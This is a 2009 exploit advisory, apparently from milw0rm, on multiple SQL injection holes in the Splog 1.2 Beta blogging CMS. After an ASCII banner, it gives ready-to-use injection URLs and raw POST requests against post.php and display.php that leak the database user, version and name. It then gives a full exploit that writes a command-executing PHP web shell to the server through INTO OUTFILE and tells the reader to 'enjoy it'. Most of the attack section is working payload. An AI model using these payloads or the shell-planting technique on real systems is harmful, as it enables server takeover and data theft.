*********************************************************************************************** *********************************************************************************************** ** ** ** ** ** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** ** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** ** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** ** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ **==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- ** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] ** ** ** ** ** ** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ** ** ¡PROUD TO BE SPANISH! ** ** ** *********************************************************************************************** *********************************************************************************************** ---------------------------------------------------------------------------------------------- | MULTIPLE SQL INJECTION VULNERABILITIES | |--------------------------------------------------------------------------------------------| | | Splog <= v-1.2 Beta | | | CMS INFORMATION: -------------------------- | | | |-->WEB: http://sourceforge.net/projects/splog/ | |-->DOWNLOAD: http://sourceforge.net/projects/splog/ | |-->DEMO: N/A | |-->CATEGORY: CMS / Blogging | |-->DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing | | full integration into a website by being designed for use... | |-->RELEASED: 2009-06-01 | | | | CMS VULNERABILITY: | | | |-->TESTED ON: firefox 3 | |-->DORK: N/A | |-->CATEGORY: SQL INJECTION | |-->AFFECT VERSION: <= 1.2-Beta (Checked previous versions are also vulns) | |-->Discovered Bug date: 2009-06-08 | |-->Reported Bug date: 2009-06-09 | |-->Fixed bug date: 2009-06-10 | |-->Info patch(1.3): http://sourceforge.net/projects/splog/ | |-->Author: YEnH4ckEr | |-->mail: y3nh4ck3r[at]gmail[dot]com | |-->WEB/BLOG: N/A | |-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | |-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | ---------------------------------------------------------------------------------------------- ######################### //////////////////////// SQL INJECTION (SQLi): //////////////////////// ######################### ------------------- PROOF OF CONCEPT: ------------------- <<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> [++] GET var --> 'id' [++] File vuln --> 'post.php' ~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+SELECT+1,user(),database(),version(),user(),database()%23 <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> [++] POST var --> 'pCategory' [++] File vuln --> 'display.php' POST http://[HOST]/[PATH]/display.php HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 Referer: http://[HOST]/[PATH]/display.php Content-Type: application/x-www-form-urlencoded pCategory=-1'+UNION+SELECT+1,2,3,4,5,6# <--- INJECTION [++[Return]++] ~~~~~> user, version or database. ---------- EXPLOIT: ---------- <<<<---------++++++++++++++ Extra-Condition: privileges to create files +++++++++++++++++--------->>>> [GET]~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+ALL+SELECT+'SPLOG <= 1.2 Beta--SHELL BY --Y3NH4CK3R-->','

YOUR SHELL IS ON!
','



Get var (cmd) to execute comands. Enjoy it!

','

Command Result:

','

','

By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com

'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23 [POST]~~~~~> POST http://[HOST]/[PATH]/display.php HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 Referer: http://[HOST]/[PATH]/display.php Content-Type: application/x-www-form-urlencoded pCategory=-1'+UNION+ALL+SELECT+'SPLOG <= 1.2 Beta--SHELL BY --Y3NH4CK3R-->','

YOUR SHELL IS ON!
','



Get var (cmd) to execute comands. Enjoy it!

','

Command Result:

','

','

By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com

'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'# <--- INJECTION [++[Return]++] ~~~~~> Your shell in http://[HOST]/[PATH]/shell.php <<<-----------------------------EOF---------------------------------->>>ENJOY IT! ############################################################################## ############################################################################## ##**************************************************************************## ## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ## ##**************************************************************************## ##--------------------------------------------------------------------------## ##**************************************************************************## ## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## ##**************************************************************************## ############################################################################## ############################################################################## # milw0rm.com [2009-06-11]